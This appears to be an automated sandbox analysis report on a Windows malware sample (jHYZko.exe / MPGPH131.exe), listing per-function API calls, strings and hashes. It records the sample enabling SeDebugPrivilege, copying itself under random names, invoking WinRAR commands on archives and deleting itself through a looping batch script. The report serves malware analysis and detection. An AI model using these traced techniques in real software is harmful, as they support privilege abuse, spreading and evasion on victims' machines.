AdjustTokenPrivileges.ADVAPI32(00E613EF,00000000,?,00000010,00000000,00000000), ref: 00E611EB
CloseHandle.KERNEL32(00E613EF), ref: 00E611FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E613EF), ref: 00E61203

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E611A5

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe
API String ID: 75692138-2937809834
Opcode ID: 1c58748bc84963a3809930564b6155cb47d1d06d3812d896fd2d7a41c66d4d56
Instruction ID: 855e0d4973776976f1ed36420075a5d6edb5340f51b302a12668d05f5edb9c57
Opcode Fuzzy Hash: 1c58748bc84963a3809930564b6155cb47d1d06d3812d896fd2d7a41c66d4d56
Instruction Fuzzy Hash: 17012871900208FFDB00DFE5ED89AAEBBB9FB04345F104169E605A2151D7B05F489B50

Function 00E6139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E613BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E613DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E61448

Part of subcall function 00E6119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,?,?,00E613EF), ref: 00E611AB
Part of subcall function 00E6119F: OpenProcessToken.ADVAPI32(00000000,00000028,00E613EF,?,?,?,?,?,?,00E613EF), ref: 00E611BB
Part of subcall function 00E6119F: AdjustTokenPrivileges.ADVAPI32(00E613EF,00000000,?,00000010,00000000,00000000), ref: 00E611EB
Part of subcall function 00E6119F: CloseHandle.KERNEL32(00E613EF), ref: 00E611FA
Part of subcall function 00E6119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00E613EF), ref: 00E61203

Strings

SeDebugPrivilege, xrefs: 00E613D3
C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E613A8

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe$SeDebugPrivilege
API String ID: 4123949106-2480338808
Opcode ID: 0946fdfedb6729bdbacf036c994953741d9392db076ed8ed01265ffd6bda22ab
Instruction ID: ec70a7b0fc62565bf6ccdf903696aa361754c25be6d7de555a9ad165e2442311
Opcode Fuzzy Hash: 0946fdfedb6729bdbacf036c994953741d9392db076ed8ed01265ffd6bda22ab
Instruction Fuzzy Hash: BC31AF71D80209EADF21DBA2AC46FEEBBB8EF44384F2450A9E515B3150DB309E45CB60

Function 00E6239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00E623CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E62464
GetFileSize.KERNEL32(00000000,00000000), ref: 00E62472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00E624A8
memset.MSVCRT ref: 00E624B9
strrchr.MSVCRT ref: 00E624C9
wsprintfA.USER32 ref: 00E624DE
strrchr.MSVCRT ref: 00E624ED
memset.MSVCRT ref: 00E624F2
memset.MSVCRT ref: 00E62505
wsprintfA.USER32 ref: 00E62524
Sleep.KERNEL32(000007D0), ref: 00E62535
Sleep.KERNEL32(000007D0), ref: 00E6255D
memset.MSVCRT ref: 00E6256E
wsprintfA.USER32 ref: 00E62585
memset.MSVCRT ref: 00E625A6
wsprintfA.USER32 ref: 00E625CA
Sleep.KERNEL32(000007D0), ref: 00E625D0
Sleep.KERNEL32(000007D0,?,?), ref: 00E625E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E625FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00E62611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00E62642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00E6265B
SetEndOfFile.KERNEL32 ref: 00E6266D
CloseHandle.KERNEL32(00000000), ref: 00E62676
RemoveDirectoryA.KERNEL32(?), ref: 00E62681

Strings

%s\, xrefs: 00E6257F
-ibck, xrefs: 00E625BA
C:\Users\user\AppData\Local\Temp\, xrefs: 00E623B1, 00E623B6, 00E624CD
%s%s, xrefs: 00E624D8
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00E625C4
%s X -ibck "%s" "%s\", xrefs: 00E6251E

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-2750826870
Opcode ID: a583ca7073fdc1bc66548a0c047f48d2ad13ef25bedfff552a363b2e4a5a690a
Instruction ID: 26d4c5a44feb9de3fbc734e0268341fc77215283f2d1d849743bcb6ebacb2b81
Opcode Fuzzy Hash: a583ca7073fdc1bc66548a0c047f48d2ad13ef25bedfff552a363b2e4a5a690a
Instruction Fuzzy Hash: 6981A0B1544304AFD7109F61FC49EAFBBECEB84794F00191EF685F21A0D7B09A498B66

Function 00E6274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00E62766
memset.MSVCRT ref: 00E62774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00E62787
wsprintfA.USER32 ref: 00E627AB

Part of subcall function 00E6185B: GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61878
Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61880
Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61890
Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61894

wsprintfA.USER32 ref: 00E627C6
CopyFileA.KERNEL32(?,00E64C80,00000000), ref: 00E627D4
wsprintfA.USER32 ref: 00E627F4

Part of subcall function 00E61973: PathFileExistsA.SHLWAPI(\N,00000000,C:\Users\user\AppData\Local\Temp\jHYZko.exe), ref: 00E61992
Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00E619BA
Part of subcall function 00E61973: Sleep.KERNEL32(00000064), ref: 00E619C6
Part of subcall function 00E61973: wsprintfA.USER32 ref: 00E619EC
Part of subcall function 00E61973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E61A00
Part of subcall function 00E61973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E61A1E
Part of subcall function 00E61973: GetFileSize.KERNEL32(?,00000000), ref: 00E61A2C
Part of subcall function 00E61973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00E61A46
Part of subcall function 00E61973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E61A65

DeleteFileA.KERNEL32(?,?,00E64E54,00E64E58), ref: 00E6281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00E64E54,00E64E58), ref: 00E62832

Strings

%s%.8x.exe, xrefs: 00E627BB
%s\%s, xrefs: 00E627EE
C:\Users\user\AppData\Local\Temp\, xrefs: 00E627B6
C:\Windows\system32, xrefs: 00E627E3
\WinRAR\Rar.exe, xrefs: 00E62793
c_31892.nls, xrefs: 00E627DE
%s%s, xrefs: 00E627A5

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-613076915
Opcode ID: faae0474f159db9eb1fde48339b0cb3843f5d9da1936a2a836bf86d24a5d42b3
Instruction ID: 31fc168266a88ec7c7c0572bdc185c205561753df2e6c23ce17c88c06f588c71
Opcode Fuzzy Hash: faae0474f159db9eb1fde48339b0cb3843f5d9da1936a2a836bf86d24a5d42b3
Instruction Fuzzy Hash: 712156F6D803187BD710D7B5BC95FD7776CDB14784F0015A1B645F2092E6709F488A60

Function 00E61581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E6185B: GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61878
Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61880
Part of subcall function 00E6185B: srand.MSVCRT ref: 00E61890
Part of subcall function 00E6185B: rand.MSVCRT ref: 00E61894

wsprintfA.USER32 ref: 00E615AA
wsprintfA.USER32 ref: 00E615C6
lstrlen.KERNEL32(?), ref: 00E615D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00E615EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00E61609
CloseHandle.KERNEL32(00000000), ref: 00E61612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00E6162D

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E6158A, 00E615B3, 00E615B8, 00E615B9
%s%.8x.bat, xrefs: 00E615A4
open, xrefs: 00E61627
C:\Users\user\AppData\Local\Temp\, xrefs: 00E61599
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00E615C0

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\jHYZko.exe$open
API String ID: 617340118-817547355
Opcode ID: 1296c1536629b71716ae1bf60a0847e2ea9a117d5efe84b289734f69b1974ddd
Instruction ID: eadceaac2528c379d2d73d0cb3d800b6a1673fa8e3703c61a8c33c60d668a511
Opcode Fuzzy Hash: 1296c1536629b71716ae1bf60a0847e2ea9a117d5efe84b289734f69b1974ddd
Instruction Fuzzy Hash: 1A1154769422287FD76097B5FC89DEB7A6CDF5A790F000091F549F2041EAB09F888BB0

Function 00E6120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00E61400), ref: 00E61226
GetProcAddress.KERNEL32(00000000), ref: 00E6122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00E61400), ref: 00E6123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00E61400), ref: 00E61250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,00E61400), ref: 00E6129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,00E61400), ref: 00E612B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\jHYZko.exe,?,?,?,?,00E61400), ref: 00E612F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00E61400), ref: 00E6130A

Strings

C:\Users\user\AppData\Local\Temp\jHYZko.exe, xrefs: 00E61262
ZwQuerySystemInformation, xrefs: 00E61212
ntdll.dll, xrefs: 00E61219

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\jHYZko.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-2056654010
Opcode ID: a532be981a840878be62d634ff603b89be40eaefef777354a421800f243ec3d6
Instruction ID: aaafd656d11adf0c62c9885aecb640595fa6d9db696b09b8f575a7731f539455
Opcode Fuzzy Hash: a532be981a840878be62d634ff603b89be40eaefef777354a421800f243ec3d6
Instruction Fuzzy Hash: C6217B70685301AFD3219F65FC08B6BBAA8FB46BC4F180958F545F7250C370D948D7A5

Function 00E6189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00E618B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 00E618D3
CloseHandle.KERNEL32(I%), ref: 00E618E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E618F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00E61901
CloseHandle.KERNEL32(?), ref: 00E6190A

Strings

I%, xrefs: 00E618E0

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%
API String ID: 876959470-1881045234
Opcode ID: 1b95e5eb5fea09cf5c3f3deee6c58c92236be7cc748a9e51b68dc46a5cbb1318
Instruction ID: 619535e0b40d84e3e97f4b350be7a03b0a70813fa9822205a7e12bd94bd1c464
Opcode Fuzzy Hash: 1b95e5eb5fea09cf5c3f3deee6c58c92236be7cc748a9e51b68dc46a5cbb1318
Instruction Fuzzy Hash: EB015A72901128BBCB21ABA6EC48DDFBF7DEB857B1F104125FA15B51A0D6714A1CCBA0

Function 00E62692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,00E629DB,?,00000001), ref: 00E626A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,00E629DB,?,00000001), ref: 00E626B5
lstrlen.KERNEL32(?), ref: 00E626C4
??2@YAPAXI@Z.MSVCRT ref: 00E626CE
lstrcpy.KERNEL32(00000004,?), ref: 00E626E3
lstrcpy.KERNEL32(?,00000004), ref: 00E6271F
??3@YAXPAX@Z.MSVCRT ref: 00E6272D
SetEvent.KERNEL32 ref: 00E6273C

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 0d4232b26bee361ae132af79478ed965cc34d6ddfc0ce1144c70bdeeb0e6259c
Instruction ID: 1bf6d5a5a1ec257a58fd4fe5f30e65206724da160b8b1a74cfd8d0aa021afcfd
Opcode Fuzzy Hash: 0d4232b26bee361ae132af79478ed965cc34d6ddfc0ce1144c70bdeeb0e6259c
Instruction Fuzzy Hash: F411E2B5940504EFCB219F26FC48C5B7BA9FB907E0710401AF554BB1A0C7B19D8DCB90

Function 00E61B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00E61BCD
rand.MSVCRT ref: 00E61BD8
memset.MSVCRT ref: 00E61C43
memcpy.MSVCRT ref: 00E61C4F
lstrcat.KERNEL32(?,.exe), ref: 00E61C5D

Strings

KIPoiuRllOWSSQDJCJcafxYPDYKpqhUXoZXsFUlGivjbYkXyiZCnJgQtyknhmqeRRNDzmWjHdMPGAukbVOHZILTUjtNzTEmfBpruFEgnvQoywOHVSqcLdMxGAABIxzNWvKaLpThMceebstFfwdwrgBrVaCsE, xrefs: 00E61B8A, 00E61B9C, 00E61C15, 00E61C49
.exe, xrefs: 00E61C57

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$KIPoiuRllOWSSQDJCJcafxYPDYKpqhUXoZXsFUlGivjbYkXyiZCnJgQtyknhmqeRRNDzmWjHdMPGAukbVOHZILTUjtNzTEmfBpruFEgnvQoywOHVSqcLdMxGAABIxzNWvKaLpThMceebstFfwdwrgBrVaCsE
API String ID: 122620767-1264552426
Opcode ID: cd54c75520a5ed17026e47dc37a37aa52248b12a30cbf737dbc1191b330ac0eb
Instruction ID: e38b0ecf1125781113794699d813d1ce9f943c9a5a8eedfb6b4b4619bf408811
Opcode Fuzzy Hash: cd54c75520a5ed17026e47dc37a37aa52248b12a30cbf737dbc1191b330ac0eb
Instruction Fuzzy Hash: 1C216B62EC42D0AED3271336BC50B6F7B84CFE3795F1960D9F9853B1D2D1A409C98260

Function 00E61319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00E61334
GetProcAddress.KERNEL32(00000000), ref: 00E6133B
memset.MSVCRT ref: 00E61359

Strings

NtSystemDebugControl, xrefs: 00E6132A
ntdll.dll, xrefs: 00E6132F

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 3dd7c5cfa071d046aa312a70ebe74d34a1db9909b517e43f05af28822cadd60d
Instruction ID: 14b43c6575b59afc321a38a1d5b58c221426450a973edb1c3b94536f5237f210
Opcode Fuzzy Hash: 3dd7c5cfa071d046aa312a70ebe74d34a1db9909b517e43f05af28822cadd60d
Instruction Fuzzy Hash: 970161716C1309AFDB11DFA5BC8596FBBB8FB42398F04456AF902B1290E2B08609CB51

Function 00E61DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00E61E0B
lstrcpy.KERNEL32(?,00000001), ref: 00E61E1C
strrchr.MSVCRT ref: 00E61E2B
lstrcmpiA.KERNEL32(?,00E64488), ref: 00E61E48
lstrlen.KERNEL32(00E64488), ref: 00E61E53

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 38f01dc63af5c91bc2822fb46f505e1dde63c68500418e34dc3b73cbf3bf005d
Instruction ID: ac315ace242763dfac3e0128bfab00f1bb1dd9e0a48c1e2b57c297e8f292b107
Opcode Fuzzy Hash: 38f01dc63af5c91bc2822fb46f505e1dde63c68500418e34dc3b73cbf3bf005d
Instruction Fuzzy Hash: B901D6B29442196FEB215770FC49BD7779CDB143D5F0810A6EA45F2090EAB4DA888BE0

Function 00E6185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00E61F92,00000000,?,00000000,?,?,?,00E61F92,?,00000000,00000002), ref: 00E61867
srand.MSVCRT ref: 00E61878
rand.MSVCRT ref: 00E61880
srand.MSVCRT ref: 00E61890
rand.MSVCRT ref: 00E61894

Memory Dump Source

Source File: 00000001.00000002.2306818272.0000000000E61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000001.00000002.2306767215.0000000000E60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306851774.0000000000E64000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2306878392.0000000000E66000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_e60000_jHYZko.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: b3826adc42e9b119a13041fff5192c6b13e27e363026643709491c80efa3812f
Instruction ID: 0c811763ffc3bd2470cf0bc04fe6458c41d1ce061847092d8d1968bf3f66c041
Opcode Fuzzy Hash: b3826adc42e9b119a13041fff5192c6b13e27e363026643709491c80efa3812f
Instruction Fuzzy Hash: 3BE01B779102187FD74057BAFC4699FB7ACDF441617110566F500E3154E5B4E9488674

Analysis Process: MPGPH131.exePID: 5272, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	0%
Total number of Nodes:	395
Total number of Limit Nodes:	26

Executed Functions

Function 0109A044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0109A223

Strings

GetM, xrefs: 0109A0B6
WinE, xrefs: 0109A110
Clos, xrefs: 0109A129
el32, xrefs: 0109A0FB
jHYZko.exe, xrefs: 0109A1FD, 0109A200
athA, xrefs: 0109A199
odul, xrefs: 0109A22D
GetT, xrefs: 0109A188
.dll, xrefs: 0109A102
dleA, xrefs: 0109A0D0
lstr, xrefs: 0109A1A7
catA, xrefs: 0109A1AF
Kern, xrefs: 0109A0F4
Writ, xrefs: 0109A148
Crea, xrefs: 0109A169

Memory Dump Source

Source File: 00000007.00000002.4458054433.0000000000E70000.00000040.00000001.01000000.00000008.sdmp, Offset: 00570000, based on PE: true

Associated: 00000007.00000002.4457691165.0000000000570000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4457719191.00000000006B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458011548.00000000006C2000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000006D2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.000000000081C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.00000000008AB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4458054433.0000000000BC8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.4459085683.000000000109B000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_570000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$jHYZko.exe$lstr$odul
API String ID: 823142352-2918638317
Opcode ID: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
